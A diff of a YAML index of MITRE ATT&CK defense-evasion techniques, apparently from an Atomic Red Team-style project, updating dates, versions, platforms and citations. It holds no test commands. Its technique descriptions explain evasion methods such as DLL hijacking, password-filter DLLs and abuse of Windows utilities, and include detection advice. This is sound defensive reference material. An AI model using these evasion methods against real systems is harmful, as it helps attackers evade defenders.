+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
         Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
       - 'File: File Deletion'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1070.002
     atomic_tests: []
   T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
       - source_name: LOLBAS Installutil
         url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
         description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:47:52.603Z'
       name: 'Signed Binary Proxy Execution: InstallUtil'
       description: |-
         Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe</code>.
@@ -2404,8 +2473,6 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.004
     atomic_tests: []
   T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -2484,8 +2550,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -2552,12 +2622,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
